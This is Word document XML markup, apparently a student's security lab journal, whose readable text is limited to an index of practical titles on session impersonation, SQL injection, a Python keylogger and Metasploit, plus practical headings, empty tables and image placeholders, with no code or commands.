          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6102311B" w14:textId="648F8297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2C22CA67" w14:textId="57334008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Session Impersonation with Firefox and Tamper Data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3374F6D9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292EB58E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11DE8AC3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17FC1258" w14:textId="14D5452D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3C586C05" w14:textId="039D0DC6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SQL Injection Attack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32E3C976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67B47AF9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2E1EA9A6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0BF5133E" w14:textId="050E3698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53EFEBE4" w14:textId="0E883417" w:rsidR="006E2B58" w:rsidRPr="002228B1" w:rsidRDefault="006E2B58" w:rsidP="00AE301A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Creating a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Keylogger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 with Python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558E67D0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53318741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2B58" w:rsidRPr="00C109B5" w14:paraId="165AAE64" w14:textId="77777777" w:rsidTr="006E2B58">
        <w:trPr>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0EDB348E" w14:textId="730A14D1" w:rsidR="006E2B58" w:rsidRPr="002228B1" w:rsidRDefault="006E2B58" w:rsidP="002228B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28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14:paraId="0A7BE549" w14:textId="74D30ABF" w:rsidR="006E2B58" w:rsidRPr="002228B1" w:rsidRDefault="006E2B58" w:rsidP="002228B1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Exploiting </w:t>
            </w:r>
            <w:r w:rsidR="0093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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE301A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r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 (Kali Linux)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0289D55E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7CCB17BD" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="002228B1" w:rsidRDefault="006E2B58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228B1" w:rsidRPr="00C109B5" w14:paraId="672AD50A" w14:textId="77777777" w:rsidTr="006E2B58">
        <w:trPr>
          <w:gridBefore w:val="2"/>
          <w:gridAfter w:val="1"/>
          <w:wBefore w:w="783" w:type="dxa"/>
          <w:wAfter w:w="91" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7874" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72DEC4A5" w14:textId="77777777" w:rsidR="002228B1" w:rsidRPr="00B469D5" w:rsidRDefault="002228B1" w:rsidP="002228B1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3105"/>
              </w:tabs>
              <w:ind w:left="2502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14:paraId="7B4F3031" w14:textId="4552EC9C" w:rsidR="00AE301A" w:rsidRDefault="00AE301A"/>
    <w:p w14:paraId="194BFD8F" w14:textId="77777777" w:rsidR="00AE301A" w:rsidRDefault="00AE301A"/>
    <w:p w14:paraId="0AB0E7A2" w14:textId="3FB2E9C0" w:rsidR="00AE301A" w:rsidRDefault="00AE301A"/>
    <w:p w14:paraId="4DBE318F" w14:textId="77777777" w:rsidR="00AE301A" w:rsidRPr="002228B1" w:rsidRDefault="00AE301A"/>
    <w:p w14:paraId="683D7E59" w14:textId="1E74EC38" w:rsidR="00EC2D41" w:rsidRPr="002228B1" w:rsidRDefault="00AE301A" w:rsidP="00AE301A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3751"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE25E66" w14:textId="77777777" w:rsidR="004832A2" w:rsidRPr="00BB6EDB" w:rsidRDefault="004832A2" w:rsidP="004832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02AA0A74" wp14:editId="505FC8C6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>109789</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5197456</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="2242354"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="1390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242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504C588E" w14:textId="77777777" w:rsidR="004832A2" w:rsidRPr="00BB6EDB" w:rsidRDefault="004832A2" w:rsidP="004832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5A63C76" wp14:editId="2DD6F71F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1466623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="2512060"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="135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512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6F786A" wp14:editId="006B6CA1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3030476</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="1614449"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="1384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614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EE0FD6" w14:textId="77777777" w:rsidR="004832A2" w:rsidRPr="00BB6EDB" w:rsidRDefault="004832A2" w:rsidP="004832A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E24CD3" w14:textId="77777777" w:rsidR="004832A2" w:rsidRDefault="004832A2" w:rsidP="004832A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477DA2B2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39D751E5" w14:textId="55AD8387" w:rsidR="0094614E" w:rsidRDefault="0094614E" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F30D85B" w14:textId="73997A55" w:rsidR="0094614E" w:rsidRDefault="0094614E"/>
    <w:p w14:paraId="61F7002B" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58"/>
    <w:p w14:paraId="6C590723" w14:textId="4DA006D1" w:rsidR="0094614E" w:rsidRDefault="0094614E"/>
    <w:p w14:paraId="4F4D92AF" w14:textId="3DA48133" w:rsidR="0094614E" w:rsidRPr="00BB6EDB" w:rsidRDefault="0094614E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9A498" wp14:editId="5063AFF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-742950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>275167</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6915150" cy="508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8E581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5pt,21.65pt" to="48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B66A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL NO. 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E012E58" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB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3E5BDFF4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47B81" wp14:editId="383CCB7B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694055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78E21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pt" to="546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5AB6263" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB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94614E" w14:paraId="0E5119A2" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AEA6C7E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3A3B8A60" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58511911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22B8E29A" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19385F9E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2AAECF9C" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29D9FC3F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58472B4C" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F5F5B88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00068680" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D54F9F8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7F4BD1BC" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15628317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6F69592B" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ABA12A1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769D35F4" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="378EA6AE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10DF62AB" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="082BBC31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8FCCE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73675DFF" w14:textId="573D243C" w:rsidR="0094614E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31E360C9" w14:textId="3075E4DE" w:rsidR="002E696A" w:rsidRDefault="00F13AE7" w:rsidP="002E69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6B7CAEEB" wp14:editId="3FEDF916">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7178382</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="2890520"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="138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890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16CBF8" w14:textId="1C81891D" w:rsidR="002E696A" w:rsidRPr="002E696A" w:rsidRDefault="002E696A" w:rsidP="002E696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800BF" w14:textId="4FFDB42F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56319F83" w14:textId="6213745E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31B0C2BF" w14:textId="5B44565A" w:rsidR="0094614E" w:rsidRDefault="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B19907" w14:textId="5142E17C" w:rsidR="00AB66A5" w:rsidRDefault="00AB66A5"/>
    <w:p w14:paraId="0DD129DE" w14:textId="2C3FE418" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="2A1E3A45" w14:textId="64AE42D4" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="0C46B016" w14:textId="0EDDF325" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="73C579ED" w14:textId="79E36EBB" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="251C0308" w14:textId="3EAD1090" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="1061492B" w14:textId="7F40BCD3" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="13D06682" w14:textId="32E1996F" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="42526347" w14:textId="3406D9EF" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="2F6FFA24" w14:textId="559C5393" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="14263434" w14:textId="18AD7759" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="51C85D9C" w14:textId="0EBC0011" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="5D5B5036" w14:textId="1320FEC3" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="73DA3BD4" w14:textId="16362EAD" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="37A963A9" w14:textId="786128CD" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="42673B94" w14:textId="0D658764" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="0B07CD04" w14:textId="1B2FB900" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="4658D20C" w14:textId="3487C46B" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="1939218C" w14:textId="3FC8AFFB" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="11140BE6" w14:textId="4919369E" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="675130D9" w14:textId="0C269C53" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="4047D0D4" w14:textId="5BCE6409" w:rsidR="00F13AE7" w:rsidRDefault="00F13AE7"/>
    <w:p w14:paraId="17E0951F" w14:textId="1DC596AA" w:rsidR="006E2B58" w:rsidRDefault="006E2B58"/>
    <w:p w14:paraId="4031A76A" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58"/>
    <w:p w14:paraId="147F9589" w14:textId="77777777" w:rsidR="006F7B7D" w:rsidRDefault="006F7B7D"/>
    <w:p w14:paraId="4C2D2109" w14:textId="229EF9CE" w:rsidR="00F13AE7" w:rsidRDefault="00F13AE7"/>
    <w:p w14:paraId="47E210FA" w14:textId="76B7FF52" w:rsidR="00F13AE7" w:rsidRDefault="00F13AE7"/>
    <w:p w14:paraId="0BCAE5A7" w14:textId="77777777" w:rsidR="00F13AE7" w:rsidRDefault="00F13AE7"/>
    <w:p w14:paraId="1B2DEFD3" w14:textId="77777777" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="57576F6C" w14:textId="33B18DE0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6A777AE9" w14:textId="2CBD7B93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1E0ED065" w14:textId="25918E25" w:rsidR="004832A2" w:rsidRPr="004832A2" w:rsidRDefault="004832A2" w:rsidP="002E69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</w:p>
    <w:p w14:paraId="075AA938" w14:textId="170C80B9" w:rsidR="004832A2" w:rsidRPr="00BB6EDB" w:rsidRDefault="00F13AE7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68762948" wp14:editId="49AB9A66">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1445175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="2719705"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="1377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719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75D284" w14:textId="10F69B1A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4A4FB540" w14:textId="532D9726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6919419B" w14:textId="77777777" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCC25E6" w14:textId="4BECEFC1" w:rsidR="004832A2" w:rsidRDefault="004832A2" w:rsidP="002E696A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53CB0A20" w14:textId="7CB7A980" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="002E696A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2CEE7BCD" w14:textId="42C82981" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="002E696A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0DC07615" w14:textId="5E4EC817" w:rsidR="002E696A" w:rsidRPr="002E696A" w:rsidRDefault="002E696A" w:rsidP="002E696A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314BB516" w14:textId="406ECBEF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7592597A" w14:textId="0A7F8C5E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5A38AD1E" w14:textId="4B562FDD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44771491" w14:textId="275CCC01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2E0B0739" w14:textId="7820ECC5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34E889CB" w14:textId="77C74261" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705691B3" w14:textId="44207D3C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2D712E5B" w14:textId="6A0C1E71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6DF8B688" w14:textId="797F654E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49518259" w14:textId="51EC427C" w:rsidR="004832A2" w:rsidRDefault="004832A2" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113FFC37" w14:textId="2457D53F" w:rsidR="004832A2" w:rsidRDefault="004832A2" w:rsidP="0094614E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589CA97A" w14:textId="324A83F7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6FB576F7" w14:textId="2D45588C" w:rsidR="002E696A" w:rsidRDefault="002E696A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862B326" w14:textId="77777777" w:rsidR="002E696A" w:rsidRDefault="002E696A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6E1CD97C" w14:textId="77777777" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="63D065E7" w14:textId="18C77CC2" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE2327F" w14:textId="554D1E87" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB81B57" w14:textId="0A990321" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="000E1F33" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6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418190FE" wp14:editId="2B19B38D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1869023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3971925" cy="2476500"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="133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FD8CFB" w14:textId="46EF9614" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631651BF" w14:textId="77777777" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4B010C" w14:textId="77777777" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A742271" w14:textId="77777777" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345A3745" w14:textId="77777777" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04073354" w14:textId="77777777" w:rsidR="001374F1" w:rsidRPr="00BB6EDB" w:rsidRDefault="001374F1" w:rsidP="001374F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69254B31" w14:textId="56C28026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EBB1A7A" w14:textId="6AF3B101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21DA68C7" w14:textId="52F2660B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841A656" w14:textId="49971220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439F2A25" w14:textId="4C20A316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1B1D4E13" w14:textId="4E48E287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D2734A6" w14:textId="441BBBD1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7010FE6" w14:textId="7ECBD5A0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6CCF4AB1" w14:textId="677153F8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01AF520D" w14:textId="3DEB60FD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09F4A075" w14:textId="08BC6B1E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F6623BB" w14:textId="4C75A1DD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7CF6876" w14:textId="4AE75427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27943B7B" w14:textId="7CBA92F4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1CA4A077" w14:textId="72ACB897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67325E02" w14:textId="4BF05510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DFC328F" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58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BC119DD" w14:textId="7A0A0B79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6E671924" w14:textId="043C6169" w:rsidR="001374F1" w:rsidRDefault="001374F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82997AA" w14:textId="22B2A73C" w:rsidR="004832A2" w:rsidRDefault="004832A2"/>
    <w:p w14:paraId="7D3C7813" w14:textId="1D6E129A" w:rsidR="0094614E" w:rsidRPr="00BB6EDB" w:rsidRDefault="0094614E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13EC1" wp14:editId="6894B4EA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1524542914" name="Straight Connector 152454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044245" id="Straight Connector 15245429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832A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL NO. 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D76F02" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB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4ACA6E2D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4B90E" wp14:editId="4D0EA17F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853166022" name="Straight Connector 853166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125023" id="Straight Connector 85316602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2F19501" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB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94614E" w14:paraId="044E449E" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18EE2D58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40EB4277" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49AB04FD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684138FD" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C619FEE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4FA36037" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29341F59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576ED015" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49AEF160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76A73143" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51319829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02B7208B" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0719C56A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25C6A224" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46682E57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4F74A4FF" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50470416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6BDA37D2" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48EA9EC8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C52F9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6127F2A5" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB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64365EF3" w14:textId="7C05CA73" w:rsidR="0094614E" w:rsidRDefault="0094614E" w:rsidP="001374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5084573D" w14:textId="1E385FAD" w:rsidR="001374F1" w:rsidRPr="001374F1" w:rsidRDefault="001374F1" w:rsidP="001374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57CA0" w14:textId="16CBFF77" w:rsidR="0094614E" w:rsidRDefault="002E696A" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001374F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251817984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01B2B717" wp14:editId="2B1426D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7177433</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2390775" cy="2771775"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="1428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7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EAD2A0" w14:textId="1A5DAD3F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459F2F6C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6EB2046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541CF56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48BBC8AB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670E2B53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5A0FBE0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BEB895B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698D939" w14:textId="77777777" w:rsidR="0094614E" w:rsidRDefault="0094614E"/>
    <w:p w14:paraId="7D428785" w14:textId="77777777" w:rsidR="0094614E" w:rsidRDefault="0094614E"/>
    <w:p w14:paraId="07300DA4" w14:textId="77777777" w:rsidR="0094614E" w:rsidRDefault="0094614E"/>
